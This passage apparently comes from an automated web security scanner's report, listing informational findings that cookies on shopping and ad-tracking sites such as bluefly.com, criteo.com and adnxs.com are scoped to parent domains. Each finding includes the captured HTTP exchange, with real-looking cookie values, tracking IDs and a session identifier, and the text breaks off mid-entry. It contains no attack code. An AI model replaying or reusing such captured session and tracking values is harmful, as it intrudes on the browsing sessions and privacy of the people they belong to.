Referer: http://www.bluefly.com/myfly/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; __utma=9200358.576523501.1305510900.1305510900.1305541459.2; __utmc=9200358; __utmb=9200358.1.10.1305541459; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; SSLB=1; TLTHID=AD5EC21A7FA6107F30C796F19AE9AFF0
If-None-Match: "382a-309-47bcf0a69df80"
If-Modified-Since: Mon, 28 Dec 2009 19:37:50 GMT

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:29 GMT
Server: Apache
ETag: "382a-309-47bcf0a69df80"
Expires: Mon, 16 May 2011 10:29:29 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=AEF637347FA6107F30AC9DF5B1018F77; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-019.nym011.internap.com
X-Cache: MISS from cdce-nym011-018.nym011.internap.com
Via: 1.1 cdce-nym011-019.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-018.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


12.30. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-returning-customers.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.www.bluefly.com
Path:   /media/templates/images/myaccount/subh-returning-customers.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain, so every host under that parent domain receives it, not only the host that set it. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/myaccount/subh-returning-customers.gif HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; __utma=9200358.576523501.1305510900.1305510900.1305541459.2; __utmc=9200358; __utmb=9200358.1.10.1305541459; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; SSLB=1; TLTHID=AD5EC21A7FA6107F30C796F19AE9AFF0
If-None-Match: "3843-35a-47adcc546fc00"
If-Modified-Since: Wed, 16 Dec 2009 18:35:28 GMT

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:29 GMT
Server: Apache
ETag: "3843-35a-47adcc546fc00"
Expires: Mon, 16 May 2011 10:29:29 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=AEEAE4E27FA6107F31AAFDF870B371A3; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-018.nym011.internap.com
X-Cache: MISS from cdce-nym011-019.nym011.internap.com
Via: 1.1 cdce-nym011-018.nym011.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-nym011-019.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


12.31. http://cdn.www.bluefly.com/media/templates/images/myaccount/submit-submit.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.www.bluefly.com
Path:   /media/templates/images/myaccount/submit-submit.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/myaccount/submit-submit.gif HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
Cache-Control: max-age=0
If-Modified-Since: Mon, 30 Jun 2008 22:08:22 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "384b-c0e-450e97f688180"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSLB=1; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; TLTHID=A7FAD6BA7FA6107F3120DAB2BEB63E44

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:19 GMT
Server: Apache
ETag: "384b-c0e-450e97f688180"
Expires: Mon, 16 May 2011 10:29:19 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=A918C73C7FA6107F31F3FF7AB403FF9F; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-015.nym011.internap.com
X-Cache: MISS from cdce-nym011-014.nym011.internap.com
Via: 1.1 cdce-nym011-015.nym011.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-nym011-014.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


12.32. http://dis.us.criteo.com/dis/dis.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /dis/dis.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328 HTTP/1.1
Host: dis.us.criteo.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; uid=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; udc=*185VYQmJaGc9Pbb0uixlNCg%3d%3d; udi=*1ypiRHADgqOVLDzaJM2HozQ%3d%3d; uic=*13JJ4nVPBAZvX2oxLwxp72%2bPVcWJipruAaTcA3NuXJY2JZGgNsOGwxO9iV9ymXnS%2bRQrrGOhzs%2bgk8Hk%2fqXmKug%3d%3d; dis=*1O2O5m5J47iEnqZueLcqWtxcCi4uVmADkQsltgy969MzJl6hD0vJ9%2fYTs%2fXz4L%2ftUgL0Qy7BFIVMt8wwPwcmXYjb1pfZJNm7ONgbr495PvCrP%2bwYOZcbVabsTKpC7%2bUtdEXhHsUjV5QnjJbWD3rKEe73L0gNDHiML57wLUKPvzIf1XJTn89FQ4HhOAY1M9we5sdbBMugi6Uqt6nHW0Jt9ktDEwZzLQqkBa4IloWNE1MtaoHzfQzaFR4y0BUBsZ7DFYp2IZixF8et2lMNosgRxRWp79%2bM4TKMH6JAqdW%2bjpziQK7lZIHWWJDRuAZ6DwSBoamG%2fkBKk%2bKAtHbz1dwkmVEkQVb%2fIze05p%2fqSp4wiAPKRsFYXVNumVIafblcuOqcb

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Mon, 16 May 2011 02:01:30 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: uic=*1Tomxq8BrFqEZpOQ1bYZp%2fBO4dZgo%2b527C6zdnJIE1IWT1EPmKzBQb4n5pBlPC%2fT%2fB3YzVvHSJbrylzlwjU6Iy9ny1g89DtKdShGo4u19iVt5FU670PqdTOIyNxrGJItJ; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
Set-Cookie: udc=*185VYQmJaGc9Pbb0uixlNCg%3d%3d; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
Set-Cookie: udi=*1yi90rI1ylE1uj7gpL89Aeg%3d%3d; domain=.criteo.com; expires=Tue, 17-May-2011 02:01:31 GMT; path=/
Set-Cookie: dis=*1jiNeCk4kGIZ9mu6mPVBINFP44jJN2GwOkV4%2f%2ft9P33QKlB82NkB5zNkzE%2bekrFzM8SSGQa6U2CckAyo3mINtneKAVrvoC%2fboyA5mZpGi41ULSg0gVtk0sRCj6W62P3adaTaqypakl79Ry4nKG5uVqUR9F4AYF9WxfRJbZkS2EIVE2W209%2bPDJPrRWr33FkzHwAotwKaHsjDezbx9FPSVVVyUxz16CXz0T%2fKisSwO7BSGDea496TpUYJfHwtWUIX4OiCA0EkiWo66M7dH4pxYg05Gfyn87OaKvkdXer5hgIUx5EOBCA%2bQCmaHCTx7rJwUqtwkEryIcS8GT782Xww7sDg6zIRkRFJrSTemCS6u%2fKqr%2fpxT0arnV3oClxANx0CyRh1ULL3qPB0ZaONp2JBfF3Do4BJgpUHQJ5DTaOCWFHHqlxMwZpRlU2rL9zOyEzLY; domain=.criteo.com; expires=Wed, 16-Nov-2011 03:01:31 GMT; path=/
Content-Length: 4888

<html>
<head>
<title>Dising</title>
<script type="text/javascript">
function edcTimeout(){}
function write_edc(){}
function initEdc(){}
function cto_AI(u,n,r){if(document.createElement){if(r){v
...[SNIP]...

12.33. http://html.aggregateknowledge.com/iframe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe?wid=2&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp&senduuid=0 HTTP/1.1
Host: html.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=801458892474636324; u=5|0AQBbQQcAAAAAAAEAAQEAgA%3D%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=801458892474636324; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Sat, 14-May-2016 01:58:28 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0AQBbQRYAAAAAAQEAAQEAgA%3D%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Wed, 15-May-2013 01:58:28 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 301
Date: Mon, 16 May 2011 01:58:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="pragma" content="no-cache">
</head>

<body style="border: 0; margin: 0
...[SNIP]...

12.34. http://ib.adnxs.com/pxj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /pxj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=52&seg=95287&action=setuid%28%27c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4%27%29 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; uuid2=3420415245200633085; anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x]%)u#^pig7$W[c#Nv?q+O.JNoCKfiZd4ce5HN)-UcZc-g744:f]Q3h-dMq!LfS)mzD6/H<4e4)3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 02:01:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 02:01:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 02:01:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x]%)u#^pig7$W[c#Nv?q+O.JNoCKfhpfg<W>HN)-UcZc-g744:f]Q3h-dMq!LfS)mzD6/H@3Kt9A; path=/; expires=Sun, 14-Aug-2011 02:01:43 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 16 May 2011 02:01:43 GMT

GIF89a.............!.......,........@..L..;

12.35. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=127155&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; uuid2=3420415245200633085; anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x]%)u#^pig7$W[c#Nv?q+O.JNoCKfiZd4ce5HN)-UcZc-g744:f]Q3h-dMq!LfS)mzD6/H<4e4)3

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 02:02:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 02:02:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 02:02:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LUMbNT^``36WBKNk$WP)de8$iTmo^7XF%v'pP8UM*I8%X*/H049O+eCS(_pxE%YoD5>1HNf9<k.EsKoj%t4y%gVr2X^rA]u3E$43<; path=/; expires=Sun, 14-Aug-2011 02:02:24 GMT; domain=.adnxs.com; HttpOnly
Location: http://cm.g.doubleclick.net/pixel?nid=appnexus1
Date: Mon, 16 May 2011 02:02:24 GMT
Content-Length: 0


12.36. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=cab0b2f4-a675-49e9-abc7-97bd867f44f5&cacheBust=1305510841 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271&9000=734271&570=734271&410=734271

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271; domain=.interclick.com; expires=Sun, 16-May-2021 02:01:00 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 16 May 2011 02:01:00 GMT

GIF89a.............!.......,...........D..;

12.37. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5MjgmdGw9NDMyMDA=&piggybackCookie=uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PUBMDCID=2; KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; pubtime_27159=TMC; PMDTSHR=; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.22328.18842.49076.13450.; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; pubfreq_27159=165-1; KRTBCOOKIE_27=1216-110; KRTBCOOKIE_97=3385-uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:55 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837; domain=pubmatic.com; expires=Thu, 15-May-2014 01:53:57 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

12.38. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=tosh_cs=1&betq=7046=395215 HTTP/1.1
Host: leadback.advertising.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: ACID=gz150013044372470058; F1=B0bSJ3EBAAAABAAAAMAAgEA; BASE=23QqCCTy8s/uR9O!; ROLL=dtg1eliDxJrcjKM!; aceRTB=rm%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7Cam%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7Cdc%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7Can%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7Crub%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7C; C2=gvmyNJpwIg02FAHCdbdBwhgohXAc; GUID=MTMwNTExMTUyMDsxOjE2c2txbW0wbDE1dnAxOjM2NQ

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 10:41:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://ad.yieldmanager.com/pixel?id=563479&t=2
Set-Cookie: C2=h9P0NJpwHg02FkwBdbdBJcgohXQCbaICPfgBwB; domain=advertising.com; expires=Wed, 15-May-2013 10:41:37 GMT; path=/
Set-Cookie: GUID=MTMwNTU0MjQ5NzsxOjE2c2txbW0wbDE1dnAxOjM2NQ; domain=advertising.com; expires=Wed, 15-May-2013 10:41:37 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 16 May 2011 11:41:37 GMT
Content-Length: 0


12.39. http://media.fastclick.net/w/tre

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=20480;evt=12869;cat1=14057;cat2=14058 HTTP/1.1
Host: media.fastclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 302 Redirect
Date: Mon, 16 May 2011 10:41:38 GMT
Set-Cookie: pluto2=079565600014; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032669722/?label=xY9oCKaH0wEQmpS17AM&amp;guid=ON&amp;script=0
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=AQAAAAEAAKAAAFCgByAAA+o2AAA=; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT
Set-Cookie: pluto=079565600014; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT


12.40. http://media.gnc.com/ipixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.gnc.com
Path:   /ipixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipixel?spacedesc=1087272_1061349_1x1_1061349_1061349&target=_blank&db_afcr=123&group=GNC&event=Homepage&random=1305510847078&te_siteid=76&te_pagetype=home&REVENUE=&USERID=125602265854&ORDERID=&PRODUCTID=&CATEGORYID=0&REFERRER=&CARTVALUE=&CARTQTY= HTTP/1.1
Host: media.gnc.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; mt.v=1.1817838745.1305510198897

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:34 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.gnc.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=41-1015464695; expires=Wed, 15 May 2013 13:58:34 GMT; path=/; domain=.gnc.com
Content-Type: text/html
Content-Length: 31
Connection: close

<HTML><BODY>


</BODY></HTML>

12.41. http://media.gsimedia.net/ipixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.gsimedia.net
Path:   /ipixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipixel?spacedesc=1087320_1061349_1x1_1061349_1061349&target=_blank&db_afcr=123&group=ACE&event=Homepage&random=1305510836880&te_siteid=133&te_pagetype=home&REVENUE=&USERID=125602208394&ORDERID=&PRODUCTID=&CATEGORYID=0&REFERRER=&CARTVALUE=&CARTQTY= HTTP/1.1
Host: media.gsimedia.net
